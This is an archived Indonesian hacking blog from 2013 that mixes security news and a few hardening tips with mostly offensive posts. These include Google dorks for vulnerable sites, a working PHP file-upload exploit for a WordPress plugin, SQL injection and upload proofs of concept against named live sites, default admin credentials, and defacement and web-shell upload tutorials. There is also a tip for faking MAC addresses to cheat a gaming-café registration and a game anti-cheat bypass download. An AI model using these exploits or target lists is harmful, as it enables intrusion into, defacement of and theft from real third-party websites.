Kamis, 31 Oktober 2013

Bypass Hackshield Kagezone RF Online

Malam semua...sini saya mau membagi sedikit file saya yang tersisa :))



Download?? here

Jangan disebarluaskan :D kata temen masih dikit yang punya 

2 komentar:

Senin, 28 Oktober 2013

Cara Bermain PB di Server GWarnet tanpa harus ke Premium Warnet

Saat agan agan bermain Point Blank Indonesia pasti ada sebagian dari kita yang ingin masuk dan main di server khusus G-Warnet atau Premium Warnet, tapi malas ke warnet yang terdaftar di G-Warnet.  Nah,  disini saya akan memberikan sedikit tips bagaimana caranya agar agan-agan yang bermain Game Point Blank dirumah atau dimana saja, bisa mengakses server GWarnet tanpa harus ke Warnet Premium.

Kelebihan Bermain PB di Server Gwarnet :
- Mendapatkan Exp Up
- Mendapatkan Point Up
- Katanya Server Gwarnet aman, karena gak ada cheater. [Katanya]
jadi buat agan-agan yang ingin test skill murni cocok masuk ke server ini. :D

Oke, Supaya gak ngabisin waktu langsung aja ikuti langkah-langkah untuk bisa bermain PB [ Point Blank ] di server G-Warnet dari rumah tanpa harus ke Warnet Premium :


1.  Buat account Gwarnet, dan ikuti cara registrasi nya di www.gwarnet.com


2.  Pilih Gwarnet Premium [Jangan Pilih yang "GOLD"].
3.  Download Formulir yang disediakan Lalu di Print.



4.  Isi Form yang kita Print tadi dengan lengkap.
5.  Minimal PC / Komputer yang didaftarkan adalah 5 PC, Jadi kita isi Form bagian Physical Addres atau  MAC Addressnya hanya 1 aja yang benar [Komputer kita yang dirumah yang kita pakai] dan  4 Physical Addres  / PC MAC Address lainnya kita isi asal-asalan aja, terserah agan mau ketik angka / huruf apa [12 karakter, contoh seperti gambar di bawah].
6.  Jangan lupa sertakan materai Rp.6000 dan di Tanda Tangani.



7. Lalu Form tadi kita Scan dengan Scaner / Di foto juga bisa yang penting harus kelihatan jelas isinya kemudian kirim ke e-Mail : approve@taiga.co.id

NB :
- Cara Melihat Physical Addres / MAC Address dan IP Komputer kita :
1. Buka Connection Properti.
[biasanya ada di pojok kanan bawah taksbar dekstop, gambar monitor kedip-kedip untuk yang pake jaringan LAN/kabel atau gambar garis-garis sinyal untuk yang pake wi-fi]



2. Klik / Buka Detail



atau agan agan bisa baca-baca di http://www.gwarnet.com/index.php

Sumber: Justleecher.blogspot.com

5 komentar:

Dork Exploit Joomla com_user

intext:Joomla! [Versi Nya] site:.[terserah maunya gimana].

intext:Joomla! [VersiNya] - Open Source Content Management site:.[Suka - Suka Kalian].

inurl:index.php+intext:Joomla! [Versinya] site:.[asal bukan site ID] -_-


Selamat mendeface :*

0 komentar:

Wordpress plugins wp-mailinglist Arbitrary File Upload

#######################################################
# Exploit Title:Wordpress plugins wp-mailinglist Arbitrary File Upload
# Google Dork: "inurl:/wp-content/plugins/wp-mailinglist/"
# Exploit Author: Index Php
# Tested on: Windows, PHP 5.2
# File Type : Txt
# Author 2 : MrTieDie
# Tested on : Windows 7, Php Xampp
#######################################################
#exploit

<?php

$uf="your_file.txt";
$c = curl_init("http://target.com/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php");
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uf",
'folder'=>'/'));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($c);
curl_close($c);

print "$postResult";
?>


File path http://target.com/wp-content/uploads/wp-mailinglist/uploadify/random_name.txt

Demo sites
http://www.freresdeshommes.org/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php
http://www.whitelodge.com.sg//wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php
http://www.prairieswine.com/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php

0 komentar:

DORK BARU WPSTORE DAN COM_USER

Wordpress Themes Upload Vulnerability

inurl:/wp-content/themes/WPStore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework


 com_user

intext:Joomla! 1.7 - Open Source Content Management site:com
inurl:"using-joomla/extensions/components/" site:co.il
inurl:"com_users" site:.my
inurl:"/index.php?option=com_users" site:co.il
intext:Joomla! [Versi Nya] site:co.il
inurl:index.php+intext:Joomla! [Versinya] site:co.il

0 komentar:

WebTester 5.x Multiple Vulnerabilities

==========================================================================================
WebTester 5.x Multiple Vulnerabilities
==========================================================================================

:--------------------------------------------------------------------------------------------------------------------------

--------------:
: # Exploit Title : WebTester 5.x Multiple Vulnerabilities
: # Date : 15 October 2013
: # Author : X-Cisadane
: # CMS Developer : http://epplersoft.com/webtester.html
: # CMS Source Code : http://sourceforge.net/projects/webtesteronline/
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection, Arbitrary File Upload, PHPInfo() Disclosure, Leftover install.php File
: # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber,

Winda Utari
:--------------------------------------------------------------------------------------------------------------------------

--------------:

DORKS (How to find the target) :
================================
intext:Copyright © 2003 - 2010 Eppler Software
inurl:/go.php?testID=
intitle:WebTester Online Testing
Or use your own Google Dorks :)

Proof of Concept
================

[ 1 ] SQL Injection
POC : http://[Site]/[Path]/startTest.php?FirstName=a&LastName=a&TestID=['SQLi]
Example :
http://simuladodireitocespe.com/startTest.php?FirstName=a&LastName=a&TestID='5
http://www.huertos.eu/encuesta/startTest.php?FirstName=a&LastName=a&TestID='5
http://autoskola-buratrans.com/templates/default/ispiti/startTest.php?FirstName=a&LastName=a&TestID='5
http://conalepnl091.sytes.net/simulador/startTest.php?FirstName=a&LastName=a&TestID='5
http://learnin.elschool.pl/startTest.php?FirstName=a&LastName=a&TestID='5
...etc...

[ 2 ] Arbitrary File Upload through TinyMCE (plugins/filemanager)
Webster 5.x has a built-in WYSIWYG Editor, that is TinyMCE. The attacker can upload file through the TinyMCE File Manager.
It can be found in tiny_mce/plugins/filemanager.

Poc : http://[Site]/[Path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Example the target is http://onlinetests.germaniak.eu/
Change the url to http://onlinetests.germaniak.eu/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Pic #1 : http://i40.tinypic.com/117z390.png
Then tick : Insert filetype icon, Insert file size & Insert file modification date.
Click upload and wait until the file sent to the server.
Pic #2 : http://i39.tinypic.com/2wluaon.png
Pic #3 : http://i40.tinypic.com/2uh0fir.png
If the file was successfully uploaded, check in the /test-images/ directory.
For Example :
http://onlinetests.germaniak.eu/test-images/
http://www.rzecznik.org/test/test-images/
http://simula.se/fun/webtester5/test-images/
http://811lifestylecoach.com/test-images/
http://umpire-test.splashprojects.co.uk/test-images/
http://zamoweb.altervista.org/test-images/
...etc...

[ 3 ] PHPInfo() Disclosure
POC : http://[Site]/[Path]/phpinfo.php
Example :
http://mhsquiz.marbleheadschools.org/webtester/phpinfo.php
http://test.auzefiu.com/phpinfo.php
http://test.deltaschools.com/phpinfo.php
http://www.noordskool.com/toetse/phpinfo.php
http://bocahomehealth.com/exam/phpinfo.php
...etc...

[ 4 ] Leftover install.php File
POC : http://[Site]/[Path]/install.php
Example :
http://www.ibeucamposmacae.com.br/webtester5/install.php
http://briefhealthprograms.com/webtester5/install.php
http://intgvna.gardnervna.org/test/install.php
http://delarcollege.com/POSTUTME/install.php
http://www.orionhs.org/webtester/install.php
...etc...

Bonus : Default Username and Password
Username : admin
Password : admin
Admin Control Panel : http://[Site]/[Path]/admin/

0 komentar:

Tutorial Deface Dengan teknik Windaq

Dork : inurl:ListProduct.asp?Subject=Home

Step :
1. Buka Google
2. Masukin Dorknya
3. Pilih salah Satu Web.
4. Masukan Exploit /admin . contoh http://contoh.com/admin
5. jika disuruh masukin password, berarti itu gk vuln. kalo tampilannya login Windaq, itu baru vuln
6. Masukin ID : Windaq | Pass : st2112c
7. Selesai.

Untuk Nebas Indexnya, Ikuti Langkahnya :
1. Login Windaq di target lo
2. Klik Content.
3. cari Home, lalu klik Update.
4. Masukan Script Deface loe
5. Selesai.

0 komentar:

Kamis, 24 Oktober 2013

Mengatasi Virus dengan Klik Kiri


Virus yang di sini bukan virus H5N1 tapi virus yang menggangu aktifitas komputer anda. :bingung
Seperti virus ulet ( worm ) , Virus file ( .exe , .drv) , Virus sistem dan sekutunya. ..

Virus menyebalkan bukan ? apalagi kalau sampai membuat komputer kita hack ..setelah itu hilang data kita semua dan solusi terahir instal ulang windows..
Gmana jika ada data yang belum di format ke disk yang lain ? :gila:
jadi Berabe bukan? ?  Jika anda butuh cepat – cepat komputer anda sehat kembali ,tapi harus scan banyak file dulu ,bukannya makin nyebelin  ??
Pake aja cara mengatasi virus dengan KLIK KIRI  ? Terus kalo tidak KLIK KIRI pakai apa dunk . .. :ngakak
oke lakukan petunjuknya .
Klik START – > ALL PROGRAM -> Accessories -> System Tools ->  System Restore 

HINGGA MUNCUL GAMBAR seperti dibawah ini


lalu klik next ,jangan lupa pilih yang atas sendiri ya .. .


Lalu pilihlah tanggal sebelum komputer anda terjangkit virus . . dan next . . lalu Next lagi ..sampai finish dan tunggu komputer anda sampai hidup kembali <rengkarnasi .. :D >

Sistem restore ini berfungsi untuk mereload hardisk ke waktu sebelumnya.
Kelebihan sistem restore :
1.Sistem restore dapat mengembalikan sistem yang lalu.
2.Memberantas virus ringan ,
Kelemahan :
1.Applikasi yang di instal sebelumnya akan hilang ditelan komputer, tapi datanya tidak < seperti file datanya >
2.Dapat merusak hardisk bila keseringan digunakan < dapat ilmu dari pakar ini >
3.Sistem ini hanya menghapus data sekarang hingga ke tanggal sebelumnya ,tentunya akan kesulitan jika menghapus virus yang sudah mengenai sistem apalagi dah kena sistem restorenya juga :D

SEMUA sebenarnya dapat diubah sesuai keinginan.. . tapi tidak ditulis disini ,biar kamu makin kreatif merusak komputer sendiri .. . oke ? :supermaho

0 komentar:

Minggu, 20 Oktober 2013

Tutorial Menyembunyikan Admin Login di WordPress




 Kabar gembira nih bagi pengguna CMS WordPress, aku ada sedikit trik nih agar website anda sedikit lebih aman, biar tidak di deface gitu :D

[+] PEMBAHASAN [+]

Biasanya kalo CMS WordPress kan login adminnya di "localhost/wp-login.php: nah di trik ini ane mau bahas gimana cara gantinya :D biar para hekel-hekel bingung nemuin admin login site anda :D

[+] LANGKAH-LANGKAH [+]

1. Masuk ke Cpanel website sobat
2. Lalu masuk ke "File Manager" di Cpanel sobat.
3. Setelah itu rename file "wp-login.php" menjadi alamat login baru sobat, misalkan menjadi "iht.php" (* EKSTENSI WAJIB .php )
4. Setelah selesai, buka file "iht.php" lalu ganti semua tulisan "wp-login" menjadi "iht" setelah selesai diganti semua klik SAVE
5. Selanjutnya buka folder "wp-includes" dan cari file "general-template.php" lalu buka file general-template.php lalu renam kata "wp-login" menjadi "iht", jika sudah klik save.

Sampe step ini website anda juga belum aman sob, dikarenakan jika kita mengakses "localhost/wp-admin" kita langsung di lempar ke halaman loginnya, nah jadi gimana cara mengatasinya ? lanjut !!!!

1. Buat file berektensi .php di public_html terserah namanya apa sebagai contoh :: lol.php
2. Lalu file lol.php itu saya isi kata "Are you fucking kidding me ? your IP has been Recode hacker ^_^"
3. Setelah itu buka kembali folder wp-includes lalu buka file general-template.php, lalu cari kata ini :
function wp_login_url
nanti kalian akan menemukan tulisan seperti ini ::

function wp_login_url($redirect = ‘ ‘, $force_reauth = false) {
$login_url = site_url(‘iht.php’, ‘login’);

4. Ganti tulisan berwarna biru "iht.php" menjadi "lol.php" kemudian save :D

Dan sekarang coba sobat cek alamat login sobat apa sudah terganti atau belum, jangan lupa cek localhost/wp-admin lihat apa yang keluar ^_^

Demikian tutorial yang bisa saya sampaikan, semoga berguna :))

Thanks to : Madura-Cyber

0 komentar:

Cara Mendapatkan Banyak CPanel Dengan Mudah

Lagi surfing di google, eh nemu yang beginian,, kocak! wkwkwkw ::D Yah, kali aja ada yang mau nyoba dan bisa dimanfaatin. :D yang ga berkenan, no komen aja :) Cukup simple aja..

Pertama gunakan dork untuk mencari Cpanelnya
Dork:
inurl:":2082/login/?user="

Lalu masukkan dork ke box pencarian google, dan Enter.




Nah tinggal dibuka satu satu Cpanelnya yah :)





0 komentar:

Cara Patch Bugs SQL Injection [ Easy Method ]

Kali ini, saya akan memberikan sebuah tutorial cara mempatch bug SQL Injection, nah sebelum kita belajar ngepach apa sih SQL Injection itu ?

SQL Injection itu adalah salah sebuah celah yang keamanan yang terdapat pada lapisan basis data  pada suatu website, eror akan muncul jika attacker menambah (string) pada akhir ulr webnya. Untuk lebih jelas  langsung aja simak ulasan dari om Wikipedia dan bagi yang udah tau langsung simak cara berikut ya :)

[+] Langkah-Langkah [+]

Untuk bentuk erornya bisa lihat salah satu contoh gambar berikut :)


1. Buka editor Text misal Notepad / Notepad++, lalu copy kode berikut dan pastekan di Notepad kalian.

<?
if (ereg("%20union%20", $_GET['id'])||ereg("union",$_
GET['id']) || ereg("\*union\*",$_GET['id']) || ereg("\+union\+",
$_GET[id]) || ereg("\*",$_GET['id']))
{
ob_start();
header("location: index.php"); //bisa diganti sesuai selera :D
ob_flush();
}
?>
2. Upload file diatas ke dalam satu folder bersama index.php/public_html/htdocs
3. Kemudian buka file yang terdapat eror SQLI nya misal "http://bimo-cyber.org/artikel.php?id=011
nah jadi yang eror diatas adalah file artikel.php, maka yang di edit adalah file artikel.php
4. Kemudian masukan code berikut ke barisan code file artikel.php ( Taruh dibawah
include 'aman.php';
 5. Kemudian save, dan coba lihat hasilnya =))

Semoga sukses :D

Sumber : http://indocyberarmy.blogspot.com

0 komentar:

Bugs XSS di CMS Blogger

Bugs XSS di CMS blogger udah berhasil ditemukan,http://idiothackerteam.blogspot.com/ ada bug XSSnya tapi bodo amat dah hahaha :D

Okay, penasaran ?

Exploit :

/feeds/posts/

Poc :

Saya kasih contoh blog saya sendiri aja ya :D

http://Idiothackerteam.blogspot.com/feeds/posts/Hacked_By_Byte-007

Warna merah ganti sesuka hati kalian :D


:D Semoga bermanfaat

0 komentar:

Jumat, 18 Oktober 2013

Kerugian Kejahatan Dunia Maya Rp 1,25 Triliun

Norton Report 2013 menyebutkan, nilai kerugian yang diderita akibat kejahatan dunia maya atau cyber crime mencapai U$D 113 miliar atau Rp 1,25 triliun. Laporan dihimpun melalui survei di 24 negara yang dilakukan mulai Juli 2012 hingga Agustus 2013 yang melibatkan 13 ribu responden.

Adapun jumlah kerugian tiap pengguna internet naik hingga 50 persen. Rata-rata kerugian yang diderita yaitu U$D 298 atau Rp 3,3 juta, naik dari sebelumnya U$D 197 atau Rp 2,2 juta.

Product Marketing Manager, Consumer and Small Business Symantec Asia, Philip Routley menyebutkan faktor meningkatnya pertumbuhan kejahatan dunia maya. "Salah satunya karena didorong oleh pertumbuhan ponsel cerdas," ujarnya di Jakarta, Kamis 17 Oktober 2013.

Dia mengatakan, pengguna ponsel cerdas merupakan sasaran utama pelaku kejahatan dunia maya. Perangkat mobile memberikan kontribusi yang besar terhadap kerugian tersebut. "Sekitar 49 persen pengguna internet setiap harinya berasal dari ponsel cerdas dan tablet," katanya.

Kerugian terbanyak yang dialami korbannya yaitu finansial, disusul penipuan, kerusakan perangkat, pencurian, serta kehilangan. Selain disebabkan oleh tingginya kejahatan dunia maya, menurut Routley, kerugian berasal dari kebiasaan masyarakat yang acuh terhadap sistem keamanan di perangkat bergerak.

Routley mengatakan, masyarakat masih beranggapan bahwa melindungi komputer PC saja dari ancaman kejahatan dunia maya sudah cukup. Hal tersebut dibuktikan dengan hasil survei yang menyatakan, 72 persen pengguna internet melindungi komputernya dengan antivirus. Responden yang melindungi tabletnya dengan antivirus berjumlah 42 persen, sedangkan hanya 33 persen yang melindungi ponselnya.

Untuk mencegah peningkatan kejahatan dunia maya yang menyerang perangkat mobile, Symantec menyediakan layanan kemanan yang diberi nama Norton Mobile Security. Sistem ini dapat digunakan di perangkat berbasis Android dan iOS.

Consumer Sales Manager Symantec Indonesia, Rita Nurtika mengatakan, Norton Mobile Symantec sudah tersedia di Indonesia sejak 2012. Untuk mendukung penggunaan di perangkat mobile, Symantec menggandeng operator seluler PT XL Axiata, sejak Januari 2013. "Kami akan bekerja sama dengan operator lainnya dalam waktu dekat," katanya.

0 komentar:

iPhone Bisa Diretas dengan Charger






Tiga peneliti di Georgia Intsitute of Technology berencana menunjukkan bukti konsep sebuah charger bisa dipakai untuk memasang malware pada perangkat iOS versi mutakhir. Rencana itu akan disampaikan pada konferensi keamanan Black Hat pada Juli 2013 nanti.

Ketiga peneliti memang belum memaparkan detail hasil eksperimennya. Namun deskripsi penelitian mereka telah dipublikasikan di website konferensi. Mereka mendeskripsikan hasil eksperimen itu sebagai "peringatan". 

Kendati terdapat mekanisme pertahanan di iOS, mereka sukses menyuntikkan software sewenang-wenang ke dalam OS Apple terbaru. "Semua pengguna Apple terkena dampaknya," tulis peneliti itu. "Sedangkan tindakan kami tidak berdampak pada kerusakan atau interaksi pengguna."

Charger yang mengandung malware itu disebut Mactans. Mactans dibuat dari komputer dengan single-board terbuka yang disebut BeagleBoard, yang dijual oleh Texas Instruments dengan harga US$45 atau sekitar Rp 440 ribu. "Perangkat ini dipilih untuk mendemonstrasikan kemudahan dengan tampilan sederhana. Charger USB bervirus memang bisa diciptakan," tulis peneliti.

Charger bisa menyerang perangkat iOS kurang dari satu menit. Peneliti juga mendemonstrasikan infeksi malware yang berasal dari charger bervirus itu kuat dan sulit dibersihkan. "Kami tunjukkan bagaimana penyerang bisa menyembunyikan perangkat lunak mereka. Seperti halnya Apple menyembunyikan aplikasinya," menurut deskripsi peneliti.

Peneliti dari Georgia itu bukan bermaksud ingin meng-hack perangkat iOS melalui koneksi USB mereka. Data perangkat yang digabungkan dan lubang power telah menjadi poin paling umum yang dijadikan celah bagi hacker untuk merusak perangkat mereka untuk menghapus aturan Apple pada perangkat mereka. 

Perombakan itu digunakan lebih dari 18 kali oleh pengguna iOS untuk meng-hack iPhone, iPad, iPod sentun sebelum Apple memperbarui perangkat lunaknya. Atas hal ini, para peneliti itu menunjukkan teknik yang lebih ramah, berharap Apple untuk gerak cepat untuk merevisi bug yang mereka ekspos.

0 komentar:

Indonesia Juara ke-3 Kompetisi Hacking Dunia

Para jagoan IT Indonesia kembali unjuk gigi di event dunia. Indonesia yang diwakili oleh tim Rentjong meraih juara ke-3 dalam kompetisi hacking Capture The Flag (CTF) di Kuala Lumpur, Malaysia.

CTF merupakan bagian dari konferensi tahunan Hack In The Box (HITB). Sedangkan juara ke-1 dan ke-2 diraih oleh tim dari Vietnam. Selain tim Rentjong, Indonesia juga diwakili oleh tim Belalang Tempur.

Acara yang digelar 16 - 17 Oktober 2013 ini adalah kompetisi hacking internasional diikuti oleh 10 tim dari 7 negara: Korea, Jepang, Belanda, Singapura, Malaysia, Vietnam dan Indonesia.

Tim Rentjong sendiri diisi oleh penggiat-penggiat security Tanah Air: Rizki Wicaksono, Ammar WK dan Arif Dewantoro.

Menurut Rizki Wicaksono, kompetisi CTF menguji kemampuan peserta untuk memecahkan tantangan security seperti eksploitasi, reverse engineering, kriptografi, dan forensik yang dikemas dalam bentuk game attack dan defense antar tim.

"Setiap tim (terdiri dari 3 orang) mewakili satu negara yang harus dijaga dari serangan negara lain. Tiap tim akan mendapatkan senjata, firepower atau nuke yang bisa dipakai untuk menyerang tim lain bila berhasil memecahkan tantangan yang diberikan. Tim yang memiliki skor tertinggi menjadi pemenangnya," jelas Rizki, Jumat (18/10/2013).

HITB sendiri adalah konferensi tahunan di bidang security yang menjadi ajang berkumpulnya security researcher dan hacker dari berbagai negara untuk mempresentasikan berbagai hasil temuan dan riset terkait cyber security.

0 komentar:

Para Penyerang Cyber dari Indonesia Adalah 'Zombie'


 Indonesia diklaim Akamai Technology sebagai sumber serangan cyber dunia. Tapi ternyata para pelakunya belum tentu adalah warna negara Indonesia.

Dalam laporannya, Akamai juga menuliskan bahwa serangan tersebut belum tentu berasal dari Indonesia, tapi bisa jadi para pelaku dari negara lain yang hanya mendompleng alamat IP dalam negeri.

Senada dengan Akamai. Alfons Tanujaya, praktisi keamanan internet dari Vaksincom juga merasa serangan itu bukan dilakukan oleh peretas lokal, tapi para dedemit maya yang berada di luar sana.

"Mereka menggunakan bot yang melakukan scaning ke seluruh dunia untuk menemukan bug tertentu. Jika sudah didapat, komputer tersebut akan dijadikan 'zombie' untuk kemudian dikendalikan," jelas Alfons, Jumat (18/10/2013).

Lebih lanjut Alfons menjelaskan bahwa hal itu bisa terjadi karena kurang pedulinya para pengguna komputer terhadap keamanan di internet. Tak sedikit dari mereka yang mengunjungi situs-situs dengan berbagai jebakan di dalamnya.

Kondisi itu diperparah oleh para pengelola IP publik di Tanah Air yang dianggap tidak becus memelihara keamanan jaringan mereka.

"Mereka yang mengelola harusnya sadar, dan bisa mengambil langkah-langkah untuk mengamankan server mereka. Harusnya mereka malu dengan kejadian ini," tegas Alfons

Menurut data Akamai, dibanding kuartal pertama 2013, kuartal kedua 2013 ini jumlah serangan yang berasal dari Indonesia meningkat hingga dua kali lipat.

Berdasarkan laporan keamanan tersebut, Indonesia kini mengantongi porsi terbesar serangan dengan perolehan 38%, naik 17% dari periode sebelumnya. Sedangkan China, yang sebelumnya mendominasi, kini hanya memiliki porsi 33%.F

0 komentar:

Menambah sistem keamanan pada website joomla




Aksi hacker yang semakin hari semakin marak di dunia maya tentunya membuat kita semakin resah memikirkan website/blog kita yang tidak terbebas dari ancaman para hacker yang semakin hari semakin pintar mencari celah kelemahan yang ada pada CMS website kita, salah satunya diantaranya adalah CMS Joomla. Setiap CMS termasuk Joomla selalu mempunyai celah bug/keamanan yang senantiasa di analisa oleh para pengembangnya untuk ditutupi dengan script yang lebih aman akan tetapi bug ini juga dianalisa oleh hacker untuk disisipi script berbahaya. Oleh karena itu sembari menunggu update terbaru dari pengembang CMS Joomla, kita juga perlu menutupi celah ini dengan berbagai cara yang ada, apa saja cara menambah sistem keamanan Website dengan CMS Joomla?, mari ikuti tutorialnya dibawah ini:


1. Update Versi Joomla/component/plugin/Extension anda dengan update terbaru. untuk melakukan update joomla anda dapat mempergunakan Jupdateman

http://www.qwords.com/kb/update-joomla-dengan-jupdateman/

2. Ganti prefix database dengan prefix lain (jos_)

Untuk menghindari peretas melakukan SQL injection ke database joomla, maka buatlah peretas tidak dapat menemukan jos_users. caranya, ubah prefix jos_ ke prefix lain:
- Login Joomla Back End
- Masuk ke Global Configuration
- Pada bagian database, ganti prefix dari jos_ ke prefix lain, contoh: qwerty_ , jika sudah lalu pilih save
- Masuk ke menu phpMyAdmin dan pilih database anda
- Pilih Export -> Go
- setelah Database terdownload, hapus database anda di phpmyadmin
- Buka file sql yang didownload menggunakan notepad -> pilih Search & Replace (Ctrl + H) -> isi kotak search dengan jos_ -> isi kotak replace dengan qwerty_ -> klik Replace All ->Save
- Pilih menu Import di phpMyAdmin -> Pilih sql yang diedit diatas -> Go

3. Sembunyikan Versi Joomla Anda

Peretas akan sangat mudah menghack joomla anda jika website joomla anda menampilkan versinya saat di View Page Source, hacker tinggal melihat catatan celah keamanan sesuai versinya lalu melakukan aksinya tanpa bersusah payah mencoba semua cara hack yang ada. oleh karena itu sembuyikan versi joomla anda dengan cara:
- Login Cpanel anda
- Masuk File manager
- Masuk ke folder *public_html/libraries/joomla/document/html/renderer/
- Edit file head.php
temukan script dibawah ini
$strHtml .= $tab.'<meta name="generator" content="'.$document->getGenerator().'" />'.$lnEnd;
Ubah menjadi:
//$strHtml .= $tab.'<meta name="generator" content="'.$document->getGenerator().'" />'.$lnEnd;
- Masuk ke folder *public_html/templates/namatemplate/
- Edit file index.php
temukan script dibawah ini:
<jdoc:include type="head" />:
tambahkan tepat diatas script tersebut:
$this->setGenerator(null);
atau
$this->setGenerator("");
atau
$document = &JFactory::getDocument();
$document->setGenerator('');
- Save

4. Selalu  hanya menginstall Component/plugin/extension yang terpercaya dan langsung dari pengembangnya. Anda dapat melihat link berikut untuk daftar Extension Joomla yang mempunyai celah bug/bermasalah:

http://docs.joomla.org/Vulnerable_Extensions_List

4. Pergunakan CHMOD yang sesuai, file 644 sedangkan folder 755

http://www.qwords.com/kb/mengganti-chmod-permission/

5. Ubah Password admin Cpanel dan Back End Joomla secara berkala


6. Tidak hanya mendisablenya tapi juga Hapus Component/Plugin/Extension yang tidak digunakan.


7. Edit file .htaccess anda melalui File Manager, tambahkan script dibawah ini:


########## Begin - Rewrite rules to block out some common exploits

#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
# Block out any script that includes a < script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2}) [OR]
# Block out any script that tries to set CONFIG_EXT (com_extcal2 issue)
RewriteCond %{QUERY_STRING} CONFIG_EXT([|%20|%5B).*= [NC,OR]
# Block out any script that tries to set sbp or sb_authorname via URL (simpleboard)
RewriteCond %{QUERY_STRING} sbp(=|%20|%3D) [OR]
RewriteCond %{QUERY_STRING} sb_authorname(=|%20|%3D)
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits



8. Amankan halaman login backend joomla dengan Jsecure

http://www.qwords.com/kb/halaman-admin-joomla-lebih-aman-dengan-jsecure-authentication/

—————————————————————————————————————————————————

Langkah-langkah di atas tidak menjamin website Joomla anda aman 100% dari hacker. Untuk lebih menyulitkan para hacker untuk masuk ke website anda, kami sarankan juga menggunakan password yang kuat pada cPanel hosting. Usahakan password pada cPanel dan Back end Joomla anda menggunakan password yang berbeda.
Semoga tutorial ini dapat membantu anda yang ingin selalu menjaga website Joomla tetap aman.

1 komentar:

Cara mengetahui IP Suatu Web


untuk mengetahui IP suatu web pertama kita buka CMD

1).Start => Run => Tulis Cmd
2).Tuliskan ping www.JagadHs.com <contoh


3).Tekan Enter Lalu Akan Keluar Seperti Gmbar Di Bawah Ini


Muncul dah tuh IP web nya :D

0 komentar:

Deface dengan Flashchat

Oke Kali Ini Ane Mau SHare Deface Dengan Flashchat Nemu Di Web 1337 Kwkwk :D Oke Langsung Saja Ya Om

1).Buat File html Lalu Masukan Script Berikut

<form action="http://Target/forums/chat/upload.php" method="post"

enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>

2).Cari Target Pkek Dork : (Use Your Brain):p

3).Masukan Targetnya Ke File html Tadi :D


4).Lalu Upload ke Hosting Ato Pkek Xampp Klo Gw Pke XAMPP Truss Ada Kayak Uploader Upload Aja Shellnya
5).Klo Succes Akan Ada Tulisan Seperti Ini Om ok-!@shellkmu.php

6).Tinggal Eksekusi Dehh Shelnya :D Untuk Letak shell                                                              http://site.com/chat/temp/namashellkalian.php

NB:JIKA TDK BISA TANAM SHELL LANGSUNG UPLOAD SCRIPT DEFACE ANDA

Semoga bermanfaat

0 komentar:

Cara Merubah IP Address Ke Negara Lain

Merubah IP Address banyak dilakukan oleh kalangan pengguna internet , khususnyan untuk kepentingan yang sedikit dibilang ilegal. Banyak situs  yang hanya menyediakan layanannya ke negara tertentu saja, biasanya untuk sementara tidak tersedia di lokasi anda. Fakta tersebut menyababkan sebagiaan pengguna internet mencari jalan keluarnya yaitu dengan cara Merubah IP Address ke negara lain agar situs tersebut menyediakan layanannya. Untuk itu saya memberi tips sangat mudah untuk merubah IP Address ke negara lain, berikut langkah-langkah yang harus di perhatikan.
1. Kunjungi situs berikut:http://hidemyass.com/
2. Pilih IP:Port Proxies
3. Lalu lihat kebawah ada tabel seperti ini, perhatikan yang saya kasih lingkaran merah, yang pertama    hilangkan tanda centang, pilih negara United States, Hilangkan lagi centang yang terdapat pada kolom Speed dan Connection yaitu Slow dan Medium, lalu klik Update Results.


4. Selanjutnya lihat kebawah lagi perhatikan tabel yang seperti ini, di situ sudah terlihat IP Address dari negara United States yang speed dan connection timenya Fast/yang hijau penuh,dan cari IP Addressnya mempunyai port 8080, karena terkadang yang portnya bukan 8080 ada masalahnya

 5. Setelah ketemu anda copy IP Addressnya.
6. Sekarang browser melalui Firefox, kalau lewat google chrome bisa baca artikel dengan klikCara Mengatasi Smartfren Lelet di situ ada, baiklah kita akan mencoba menggunakan Firefox pertama kita klik Firefox yang ada di pojok atas pilih optoins, pilih Avanced, pilih Network, masuk setting
7. Perhatikan tabel di bawah ini


   Pilih Manual proxy configuration:
b.      Masukan IP Address yang tadi kamu copy, di HTTP Proxy
c.       Jangan lupa Portnya 8080
d.      Terus beri tanda centang pada Use this proxy server for all protocols
e.      Terahir klik Ok, selesai sudah
f.    Coba kita lihat dulu apakah sudah berubah IP Adderessnya, caranya masuk di:http://whatismyipaddress.com/

Demikian tips Cara Merubah IP Address Ke Negara Lain
Semoga bermafaat.

0 komentar:

Selasa, 15 Oktober 2013

XAMPP FOR LINUX WRITE ACCESS VULNERABILITY

Exploitnya masih hangat nih :P

Dork:
1. allinurl:/xampp/
2.inurl:/xampp/index.php

cari target make dork yang udah ane siapin :D


nih gua nemu target http://110.4.47.228/xampp/index.php


